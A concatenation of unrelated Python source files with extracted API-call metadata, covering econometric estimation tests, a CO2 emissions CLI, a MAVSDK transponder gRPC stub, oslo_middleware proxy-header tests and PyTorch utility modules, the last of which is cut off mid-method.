[((616, 644), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (628, 644), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((651, 677), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (662, 677), False, 'from test.utils.functional_tools import average_out\n'), ((1310, 1332), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (1318, 1332), True, 'import numpy as np\n'), ((1765, 1793), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (1777, 1793), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((1800, 1826), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (1811, 1826), False, 'from test.utils.functional_tools import average_out\n'), ((2485, 2507), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (2493, 2507), True, 'import numpy as np\n'), ((2940, 2968), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (2952, 2968), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((2975, 3001), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (2986, 3001), False, 'from test.utils.functional_tools import average_out\n'), ((3695, 3717), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (3703, 3717), True, 'import numpy as np\n'), ((4167, 4195), 'source_ddc.probability_tools.StateManager', 'StateManager', ([], {'miles': 'n_states'}), '(miles=n_states)\n', (4179, 4195), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((4202, 4228), 'test.utils.functional_tools.average_out', 'average_out', (['n_repetitions'], {}), '(n_repetitions)\n', (4213, 4228), False, 
'from test.utils.functional_tools import average_out\n'), ((5063, 5085), 'numpy.array', 'np.array', (['[0.05, 0.05]'], {}), '([0.05, 0.05])\n', (5071, 5085), True, 'import numpy as np\n'), ((373, 401), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (384, 401), True, 'import numpy as np\n'), ((710, 826), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (718, 826), False, 'from source_ddc.simulation_tools import simulate\n'), ((950, 1113), 'source_ddc.algorithms.NFXP', 'NFXP', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, parameter_names=['variable_cost',\n 'replacement_cost'])\n", (954, 1113), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((1522, 1550), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (1533, 1550), True, 'import numpy as np\n'), ((1861, 1977), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (1869, 1977), False, 'from source_ddc.simulation_tools import simulate\n'), ((2101, 2279), 'source_ddc.algorithms.CCP', 'CCP', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, 
simple_transition_matrix,\n utility_fn, discount_factor, initial_p=ccp, parameter_names=[\n 'variable_cost', 'replacement_cost'])\n", (2104, 2279), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((2697, 2725), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (2708, 2725), True, 'import numpy as np\n'), ((3034, 3150), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (3042, 3150), False, 'from source_ddc.simulation_tools import simulate\n'), ((3259, 3290), 'source_ddc.probability_tools.random_ccp', 'random_ccp', (['n_states', 'n_choices'], {}), '(n_states, n_choices)\n', (3269, 3290), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((3312, 3490), 'source_ddc.algorithms.NPL', 'NPL', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'parameter_names': "['variable_cost', 'replacement_cost']"}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, initial_p=ccp, parameter_names=[\n 'variable_cost', 'replacement_cost'])\n", (3315, 3490), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((3924, 3952), 'numpy.meshgrid', 'np.meshgrid', (['states', 'choices'], {}), '(states, choices)\n', (3935, 3952), True, 'import numpy as np\n'), ((4261, 4377), 'source_ddc.simulation_tools.simulate', 'simulate', (['(500)', '(100)', 'n_choices', 'state_manager', 'true_params', 'utility_fn', 'discount_factor', 'simple_transition_matrix'], {}), '(500, 100, n_choices, state_manager, true_params, utility_fn,\n discount_factor, simple_transition_matrix)\n', (4269, 4377), False, 'from source_ddc.simulation_tools import simulate\n'), 
((4564, 4595), 'source_ddc.probability_tools.random_ccp', 'random_ccp', (['n_states', 'n_choices'], {}), '(n_states, n_choices)\n', (4574, 4595), False, 'from source_ddc.probability_tools import StateManager, random_ccp\n'), ((4617, 4832), 'source_ddc.algorithms.NPL', 'NPL', (["df['action'].values", "df['state'].values", 'simple_transition_matrix', 'utility_fn', 'discount_factor'], {'initial_p': 'ccp', 'relaxation_param': '(0.9)', 'parameter_names': "['variable_cost', 'replacement_cost']", 'npl_maxiter': '(50)'}), "(df['action'].values, df['state'].values, simple_transition_matrix,\n utility_fn, discount_factor, initial_p=ccp, relaxation_param=0.9,\n parameter_names=['variable_cost', 'replacement_cost'], npl_maxiter=50)\n", (4620, 4832), False, 'from source_ddc.algorithms import NFXP, NPL, CCP\n'), ((1351, 1384), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (1357, 1384), True, 'import numpy as np\n'), ((2526, 2559), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (2532, 2559), True, 'import numpy as np\n'), ((3736, 3769), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (3742, 3769), True, 'import numpy as np\n'), ((5104, 5137), 'numpy.abs', 'np.abs', (['(mean_params - true_params)'], {}), '(mean_params - true_params)\n', (5110, 5137), True, 'import numpy as np\n'), ((429, 449), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (435, 449), True, 'import numpy as np\n'), ((1578, 1598), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (1584, 1598), True, 'import numpy as np\n'), ((2753, 2773), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (2759, 2773), True, 'import numpy as np\n'), ((3980, 4000), 'numpy.log', 'np.log', (['(m_states + 1)'], {}), '(m_states + 1)\n', (3986, 4000), True, 'import numpy as np\n')]
|
#SAP DevelopmentChallange solution, written by <NAME> (<EMAIL>)
#Version: 01_28082020
#License: MIT
import sys
import argparse
from emissions import VehicleEmissions
# Important note: ArgumentParser converts any "-" to "_" in option names.
ap = argparse.ArgumentParser()
ap.add_argument("--distance", "-dist", help="Total distance travelled")
ap.add_argument("--unit-of-distance", "-unit-dist", help="Unit of distance: kilometers (default) or meters")
ap.add_argument("--transportation-method", "-tran-mthd", help="Type of vehicle used for calculation")
ap.add_argument("--output", "-out", help="Output of emissions in either kilograms or grams (default)")
args = vars(ap.parse_args())

# Distance is mandatory and must parse as a number.
if args["distance"] is None:
    sys.exit("No input distance given! Exiting...")
try:
    input_distance = float(args["distance"])
except ValueError:
    # Previously a non-numeric distance crashed with a raw traceback.
    sys.exit("Input distance is not a number! Exiting...")

# Unit of distance defaults to kilometers.
if args["unit_of_distance"] is None:
    print("No unit of distance given, using KM by default")
    distance_unit = "km"
else:
    distance_unit = args["unit_of_distance"]

# Vehicle type is mandatory (name validity is checked again inside VehicleEmissions).
if args["transportation_method"] is None:
    sys.exit("No vehicle type given! Exiting...")
vehicle_type = args["transportation_method"]

# Optional output unit: "g", "kg", or unset (defaults to kg).
output = args["output"]

# Normalize distance to kilometers before the emission calculation.
if distance_unit == "m":
    input_distance = input_distance / 1000.0

# Create instance of vehicle object and calculate the emissions.
vehicle = VehicleEmissions(vehicle_type)
vehicle.CalculateEmission(input_distance)

if output == "g":
    outputEmission = vehicle.GetEmissionGrams()
    print("Your trip caused " + str(outputEmission) + "g of CO2-equivalent.")
elif output == "kg" or output is None:
    outputEmission = vehicle.GetEmmisionKG()
    print("Your trip caused " + str(outputEmission) + "kg of CO2-equivalent.")
else:
    # Previously an unrecognized unit silently produced no output at all.
    sys.exit("Unknown output unit '" + output + "'! Use 'g' or 'kg'. Exiting...")
|
[
"emissions.VehicleEmissions",
"argparse.ArgumentParser",
"sys.exit"
] |
[((230, 255), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (253, 255), False, 'import argparse\n'), ((1487, 1517), 'emissions.VehicleEmissions', 'VehicleEmissions', (['vehicle_type'], {}), '(vehicle_type)\n', (1503, 1517), False, 'from emissions import VehicleEmissions\n'), ((727, 774), 'sys.exit', 'sys.exit', (['"""No input distance given! Exiting..."""'], {}), "('No input distance given! Exiting...')\n", (735, 774), False, 'import sys\n'), ((1078, 1123), 'sys.exit', 'sys.exit', (['"""No vehicle type given! Exiting..."""'], {}), "('No vehicle type given! Exiting...')\n", (1086, 1123), False, 'import sys\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import transponder_pb2 as transponder_dot_transponder__pb2
class TransponderServiceStub(object):
    """
    Allow users to get ADS-B information
    and set ADS-B update rates.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        # Server-streaming RPC: one subscribe request, then a stream of
        # TransponderResponse messages as transponder data arrives.
        self.SubscribeTransponder = channel.unary_stream(
                '/mavsdk.rpc.transponder.TransponderService/SubscribeTransponder',
                request_serializer=transponder_dot_transponder__pb2.SubscribeTransponderRequest.SerializeToString,
                response_deserializer=transponder_dot_transponder__pb2.TransponderResponse.FromString,
                )
        # Unary RPC: set the rate at which transponder updates are delivered.
        self.SetRateTransponder = channel.unary_unary(
                '/mavsdk.rpc.transponder.TransponderService/SetRateTransponder',
                request_serializer=transponder_dot_transponder__pb2.SetRateTransponderRequest.SerializeToString,
                response_deserializer=transponder_dot_transponder__pb2.SetRateTransponderResponse.FromString,
                )
class TransponderServiceServicer(object):
    """
    Allow users to get ADS-B information
    and set ADS-B update rates.

    Generated base class: subclass and override the methods below to
    implement the service; the defaults report UNIMPLEMENTED.
    """

    def SubscribeTransponder(self, request, context):
        """Subscribe to 'transponder' updates.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def SetRateTransponder(self, request, context):
        """Set rate to 'transponder' updates.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_TransponderServiceServicer_to_server(servicer, server):
    """Register a TransponderServiceServicer implementation on a grpc server.

    Maps each RPC name to the servicer method with the matching
    serialization, then installs the resulting generic handler.
    """
    rpc_method_handlers = {
            'SubscribeTransponder': grpc.unary_stream_rpc_method_handler(
                    servicer.SubscribeTransponder,
                    request_deserializer=transponder_dot_transponder__pb2.SubscribeTransponderRequest.FromString,
                    response_serializer=transponder_dot_transponder__pb2.TransponderResponse.SerializeToString,
            ),
            'SetRateTransponder': grpc.unary_unary_rpc_method_handler(
                    servicer.SetRateTransponder,
                    request_deserializer=transponder_dot_transponder__pb2.SetRateTransponderRequest.FromString,
                    response_serializer=transponder_dot_transponder__pb2.SetRateTransponderResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'mavsdk.rpc.transponder.TransponderService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
|
[
"grpc.unary_stream_rpc_method_handler",
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler"
] |
[((2468, 2575), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""mavsdk.rpc.transponder.TransponderService"""', 'rpc_method_handlers'], {}), "(\n 'mavsdk.rpc.transponder.TransponderService', rpc_method_handlers)\n", (2504, 2575), False, 'import grpc\n'), ((1826, 2093), 'grpc.unary_stream_rpc_method_handler', 'grpc.unary_stream_rpc_method_handler', (['servicer.SubscribeTransponder'], {'request_deserializer': 'transponder_dot_transponder__pb2.SubscribeTransponderRequest.FromString', 'response_serializer': 'transponder_dot_transponder__pb2.TransponderResponse.SerializeToString'}), '(servicer.SubscribeTransponder,\n request_deserializer=transponder_dot_transponder__pb2.\n SubscribeTransponderRequest.FromString, response_serializer=\n transponder_dot_transponder__pb2.TransponderResponse.SerializeToString)\n', (1862, 2093), False, 'import grpc\n'), ((2148, 2422), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.SetRateTransponder'], {'request_deserializer': 'transponder_dot_transponder__pb2.SetRateTransponderRequest.FromString', 'response_serializer': 'transponder_dot_transponder__pb2.SetRateTransponderResponse.SerializeToString'}), '(servicer.SetRateTransponder,\n request_deserializer=transponder_dot_transponder__pb2.\n SetRateTransponderRequest.FromString, response_serializer=\n transponder_dot_transponder__pb2.SetRateTransponderResponse.\n SerializeToString)\n', (2183, 2422), False, 'import grpc\n')]
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from wsgiref import util
from oslotest import base as test_base
import webob
from oslo_middleware import http_proxy_to_wsgi
class TestHTTPProxyToWSGI(test_base.BaseTestCase):
    """Tests for HTTPProxyToWSGI with proxy-header parsing enabled.

    The fake WSGI app echoes the application URI reconstructed from the
    environ (or, in the forwarded-for test, the remote address), so each
    assertion checks how the middleware rewrote the request from the
    X-Forwarded-* / RFC 7239 Forwarded headers.
    """

    def setUp(self):
        super(TestHTTPProxyToWSGI, self).setUp()

        @webob.dec.wsgify()
        def fake_app(req):
            # Echo the URI the environ reconstructs after the middleware ran.
            return util.application_uri(req.environ)

        self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGI(fake_app)
        self.middleware.oslo_conf.set_override('enable_proxy_headers_parsing',
                                               True,
                                               group='oslo_middleware')
        self.request = webob.Request.blank('/foo/bar', method='POST')

    def test_backward_compat(self):
        # The old HTTPProxyToWSGIMiddleware alias must keep working.
        @webob.dec.wsgify()
        def fake_app(req):
            return util.application_uri(req.environ)
        self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware(
            fake_app)
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"http://localhost:80/", response.body)

    def test_no_headers(self):
        # Without any forwarding headers the URL is left untouched.
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"http://localhost:80/", response.body)

    def test_url_translate_ssl(self):
        self.request.headers['X-Forwarded-Proto'] = "https"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://localhost:80/", response.body)

    def test_url_translate_ssl_port(self):
        self.request.headers['X-Forwarded-Proto'] = "https"
        self.request.headers['X-Forwarded-Host'] = "example.com:123"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://example.com:123/", response.body)

    def test_url_translate_host_ipv6(self):
        # Bracketed IPv6 host with a port must survive the rewrite intact.
        self.request.headers['X-Forwarded-Proto'] = "https"
        self.request.headers['X-Forwarded-Host'] = "[fdf8:f53e:61e4::18]:123"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://[fdf8:f53e:61e4::18]:123/", response.body)

    def test_url_translate_base(self):
        self.request.headers['X-Forwarded-Prefix'] = "/bla"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"http://localhost:80/bla", response.body)

    def test_url_translate_port_and_base_and_proto_and_host(self):
        self.request.headers['X-Forwarded-Proto'] = "https"
        self.request.headers['X-Forwarded-Prefix'] = "/bla"
        self.request.headers['X-Forwarded-Host'] = "example.com:8043"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://example.com:8043/bla", response.body)

    def test_rfc7239_invalid(self):
        # A malformed Forwarded header must be ignored, not crash parsing.
        self.request.headers['Forwarded'] = (
            "iam=anattacker;metoo, I will crash you!!P;m,xx")
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"http://localhost:80/", response.body)

    def test_rfc7239_proto(self):
        # Only the first element of the Forwarded list is honoured.
        self.request.headers['Forwarded'] = (
            "for=foobar;proto=https, for=foobaz;proto=http")
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://localhost:80/", response.body)

    def test_rfc7239_proto_host(self):
        self.request.headers['Forwarded'] = (
            "for=foobar;proto=https;host=example.com, for=foobaz;proto=http")
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://example.com/", response.body)

    def test_rfc7239_proto_host_base(self):
        # RFC 7239 Forwarded and X-Forwarded-Prefix may be combined.
        self.request.headers['Forwarded'] = (
            "for=foobar;proto=https;host=example.com:8043, for=foobaz")
        self.request.headers['X-Forwarded-Prefix'] = "/bla"
        response = self.request.get_response(self.middleware)
        self.assertEqual(b"https://example.com:8043/bla", response.body)

    def test_forwarded_for_headers(self):
        @webob.dec.wsgify()
        def fake_app(req):
            # Echo the remote address the middleware resolved.
            return req.environ['REMOTE_ADDR']
        self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware(
            fake_app)
        forwarded_for_addr = '1.2.3.4'
        forwarded_addr = '8.8.8.8'

        # If both X-Forwarded-For and Fowarded headers are present, it should
        # use the Forwarded header and ignore the X-Forwarded-For header.
        self.request.headers['Forwarded'] = (
            "for=%s;proto=https;host=example.com:8043" % (forwarded_addr))
        self.request.headers['X-Forwarded-For'] = forwarded_for_addr
        response = self.request.get_response(self.middleware)
        self.assertEqual(forwarded_addr.encode(), response.body)

        # Now if only X-Forwarded-For header is present, it should be used.
        del self.request.headers['Forwarded']
        response = self.request.get_response(self.middleware)
        self.assertEqual(forwarded_for_addr.encode(), response.body)
class TestHTTPProxyToWSGIDisabled(test_base.BaseTestCase):
    """Checks that forwarding headers are ignored when parsing is disabled."""

    def setUp(self):
        super(TestHTTPProxyToWSGIDisabled, self).setUp()

        @webob.dec.wsgify()
        def echo_uri_app(req):
            # Echo the application URI reconstructed from the environ.
            return util.application_uri(req.environ)

        self.middleware = http_proxy_to_wsgi.HTTPProxyToWSGI(echo_uri_app)
        self.middleware.oslo_conf.set_override('enable_proxy_headers_parsing',
                                               False,
                                               group='oslo_middleware')
        self.request = webob.Request.blank('/foo/bar', method='POST')

    def test_no_headers(self):
        body = self.request.get_response(self.middleware).body
        self.assertEqual(b"http://localhost:80/", body)

    def test_url_translate_ssl_has_no_effect(self):
        # With parsing disabled, X-Forwarded-* must not change the URL.
        self.request.headers.update({
            'X-Forwarded-Proto': "https",
            'X-Forwarded-Host': "example.com:123",
        })
        body = self.request.get_response(self.middleware).body
        self.assertEqual(b"http://localhost:80/", body)
|
[
"oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware",
"oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI",
"webob.Request.blank",
"wsgiref.util.application_uri",
"webob.dec.wsgify"
] |
[((869, 887), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (885, 887), False, 'import webob\n'), ((995, 1039), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI', 'http_proxy_to_wsgi.HTTPProxyToWSGI', (['fake_app'], {}), '(fake_app)\n', (1029, 1039), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((1267, 1313), 'webob.Request.blank', 'webob.Request.blank', (['"""/foo/bar"""'], {'method': '"""POST"""'}), "('/foo/bar', method='POST')\n", (1286, 1313), False, 'import webob\n'), ((1360, 1378), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (1376, 1378), False, 'import webob\n'), ((1486, 1540), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', 'http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', (['fake_app'], {}), '(fake_app)\n', (1530, 1540), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((4560, 4578), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (4576, 4578), False, 'import webob\n'), ((4679, 4733), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', 'http_proxy_to_wsgi.HTTPProxyToWSGIMiddleware', (['fake_app'], {}), '(fake_app)\n', (4723, 4733), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((5695, 5713), 'webob.dec.wsgify', 'webob.dec.wsgify', ([], {}), '()\n', (5711, 5713), False, 'import webob\n'), ((5821, 5865), 'oslo_middleware.http_proxy_to_wsgi.HTTPProxyToWSGI', 'http_proxy_to_wsgi.HTTPProxyToWSGI', (['fake_app'], {}), '(fake_app)\n', (5855, 5865), False, 'from oslo_middleware import http_proxy_to_wsgi\n'), ((6094, 6140), 'webob.Request.blank', 'webob.Request.blank', (['"""/foo/bar"""'], {'method': '"""POST"""'}), "('/foo/bar', method='POST')\n", (6113, 6140), False, 'import webob\n'), ((934, 967), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', (954, 967), False, 'from wsgiref import util\n'), ((1425, 1458), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', 
(1445, 1458), False, 'from wsgiref import util\n'), ((5760, 5793), 'wsgiref.util.application_uri', 'util.application_uri', (['req.environ'], {}), '(req.environ)\n', (5780, 5793), False, 'from wsgiref import util\n')]
|
import numpy as np
import torch
import torch.nn as nn
import functions.submodules as F
def norm_grad(input, max_norm):
    """Register a backward hook that renorms each sample's gradient.

    Gradients whose per-sample L2 norm already fits within ``max_norm``
    pass through unchanged (the divisor is clamped to a minimum of 1).
    """
    if not input.requires_grad:
        return

    def _renorm(grad):
        batch = grad.size(0)
        # Per-sample L2 norm; the epsilon guards against division by zero.
        per_sample = grad.view(batch, -1).norm(p=2, dim=1) + 1e-6
        shape = [batch] + [1] * (grad.dim() - 1)
        divisor = (per_sample / max_norm).clamp(min=1).view(shape)
        return grad / divisor

    input.register_hook(_renorm)
def clip_grad(input, value):
    """Clamp every gradient element of ``input`` into [-value, value]."""
    if not input.requires_grad:
        return
    input.register_hook(lambda grad: grad.clamp(min=-value, max=value))
def scale_grad(input, scale):
    """Multiply the gradient flowing into ``input`` by a constant factor."""
    if not input.requires_grad:
        return

    def _scale(grad):
        return grad * scale

    input.register_hook(_scale)
def func(func_name):
    """Map an activation name to a freshly constructed nn module.

    ``None`` passes through as ``None``; an unknown name raises
    AssertionError('Invalid func_name.').
    """
    if func_name is None:
        return None
    factories = {
        'tanh': nn.Tanh,
        'relu': nn.ReLU,
        'sigmoid': nn.Sigmoid,
        'softmax': lambda: nn.Softmax(dim=1),
    }
    assert func_name in factories, 'Invalid func_name.'
    return factories[func_name]()
class CheckBP(nn.Module):
    """Debugging module: forwards its input through the custom autograd
    Function F.CheckBP, tagged with a label.

    NOTE(review): the actual inspection/printing behaviour lives in
    functions.submodules.CheckBP — presumably it reports the gradient
    during backprop; confirm there.
    """

    def __init__(self, label='a', show=1):
        super(CheckBP, self).__init__()
        self.label = label  # tag passed to F.CheckBP to identify this site
        self.show = show    # display flag forwarded to F.CheckBP

    def forward(self, input):
        return F.CheckBP.apply(input, self.label, self.show)
class Identity(nn.Module):
    """Wrapper around the custom autograd Function F.Identity.

    NOTE(review): presumably a pass-through used as a hook point for the
    backward pass — confirm in functions.submodules.
    """

    def forward(self, input):
        return F.Identity.apply(input)
class Log(nn.Module):
    """Numerically safe elementwise natural log: log(input + eps)."""

    def __init__(self, eps=1e-20):
        super(Log, self).__init__()
        self.eps = eps  # shift so exact zeros do not produce -inf

    def forward(self, input):
        return torch.log(input + self.eps)
class Round(nn.Module):
    """
    The round operator, which is similar to the deterministic Straight-Through Estimator.
    It forwards by rounding the input, and backwards with the original output gradients.
    """
    def forward(self, input):
        # The custom autograd Function makes the backward pass an identity.
        return F.Round.apply(input)
class StraightThrough(nn.Module):
    """
    The stochastic Straight-Through Estimator.
    It forwards by sampling from the input probabilities, and backwards with the original output gradients.
    """
    def forward(self, input):
        # Sampling happens in the custom Function; backward is an identity.
        return F.StraightThrough.apply(input)
class ArgMax(nn.Module):
    """
    Input: N * K matrix, where N is the batch size.
    Output: N * K matrix, the one-hot encoding of arg_max(input) along the last dimension.
    """
    def forward(self, input):
        # Only batched 2-D inputs are supported by the custom Function.
        assert input.dim() == 2, 'only support 2D arg max'
        return F.ArgMax.apply(input)
class STGumbelSigmoid(nn.Module):
    """Straight-through Gumbel-sigmoid: binary sample in the forward pass,
    gradients of the soft sigmoid in the backward pass (via Round).

    Args:
        tao: temperature of the Gumbel relaxation.
    """

    def __init__(self, tao=1.0):
        super(STGumbelSigmoid, self).__init__()
        self.tao = tao
        self.log = Log()
        self.round = Round()

    def forward(self, mu):
        log = self.log
        # rand_like keeps the noise on mu's device and dtype; the old
        # torch.rand(mu.size()).cuda() crashed on CPU-only machines and
        # on tensors living on a non-default CUDA device.
        u1 = torch.rand_like(mu)
        u2 = torch.rand_like(mu)
        # Logistic-noise reparameterization of the Gumbel-sigmoid relaxation.
        a = (log(mu) - log(-log(u1)) - log(1 - mu) + log(-log(u2))) / self.tao
        return self.round(a.sigmoid())
class STGumbelSoftmax(nn.Module):
    """Straight-through Gumbel-softmax: one-hot sample in the forward pass,
    gradients of the soft softmax in the backward pass (via ArgMax).

    Args:
        tao: temperature of the Gumbel relaxation.
    """

    def __init__(self, tao=1.0):
        super(STGumbelSoftmax, self).__init__()
        self.tao = tao
        self.log = Log()
        self.softmax = nn.Softmax(dim=1)
        self.arg_max = ArgMax()

    def forward(self, mu):
        log = self.log
        # rand_like keeps the noise on mu's device and dtype; the old
        # torch.rand(mu.size()).cuda() crashed on CPU-only machines.
        u = torch.rand_like(mu)  # N * K
        # Gumbel(0, 1) perturbation of the log-probabilities.
        a = (log(mu) - log(-log(u))) / self.tao
        return self.arg_max(self.softmax(a))
class GaussianSampler(nn.Module):
    """Reparameterized Gaussian sampling: mu + exp(log_var / 2) * eps."""

    def forward(self, mu, log_var):
        # randn_like keeps the sample on mu's device and dtype; the old
        # torch.randn(mu.size()).cuda() crashed on CPU-only machines and
        # on tensors living on a non-default CUDA device.
        noise = torch.randn_like(mu)
        return mu + (log_var * 0.5).exp() * noise
class PermutationMatrixCalculator(nn.Module):
    """
    Input: N * K matrix, where N is the batch size.
    Output: N * K * K tensor, with each K * K matrix to sort the corresponding row of the input.
    """
    def __init__(self, descend=True):
        super(PermutationMatrixCalculator, self).__init__()
        self.descend = descend  # sort order passed to the custom Function

    def forward(self, input):
        # Only batched 2-D inputs are supported by the custom Function.
        assert input.dim() == 2, 'only support 2D input'
        return F.PermutationMatrixCalculator.apply(input, self.descend)
class Conv(nn.Module):
    """Stack of conv -> (BatchNorm) -> adaptive max-pool -> (Dropout) -> ReLU layers.

    Args:
        conv_features: channel counts per layer, length layer_num + 1.
        conv_kernels: per-layer (kh, kw) kernel sizes; padding of k//2 keeps
            the spatial size before pooling.
        out_sizes: per-layer (H, W) targets for AdaptiveMaxPool2d.
        bn: 1 to insert BatchNorm2d after each convolution.
        dp: 1 to insert Dropout2d(0.2) after each pooling step.

    Layers are registered via setattr ('conv0', 'bn0', 'pool0', ...), so
    the state-dict key layout depends on these exact names.
    """
    def __init__(self, conv_features, conv_kernels, out_sizes, bn=0, dp=0):
        super(Conv, self).__init__()
        self.layer_num = len(conv_features) - 1
        self.out_sizes = out_sizes
        assert self.layer_num == len(conv_kernels) == len(out_sizes) > 0, 'Invalid conv parameters'
        self.bn = bn
        self.dp = dp
        # Convolutional block
        for i in range(0, self.layer_num):
            setattr(self, 'conv'+str(i), nn.Conv2d(conv_features[i], conv_features[i+1],
                    (conv_kernels[i][0], conv_kernels[i][1]), stride=1,
                    padding=(conv_kernels[i][0]//2, conv_kernels[i][1]//2)))
            if bn == 1:
                setattr(self, 'bn'+str(i), nn.BatchNorm2d(conv_features[i+1]))
            setattr(self, 'pool'+str(i), nn.AdaptiveMaxPool2d(tuple(out_sizes[i])))
            if dp == 1:
                setattr(self, 'dp'+str(i), nn.Dropout2d(0.2))
        # Transformations
        self.tranform = func('relu')

    def forward(self, X):
        """Apply all layers in order; X is an N * D * H * W batch."""
        H = X  # N * D * H * W
        for i in range(0, self.layer_num):
            H = getattr(self, 'conv'+str(i))(H)
            if self.bn == 1:
                H = getattr(self, 'bn'+str(i))(H)
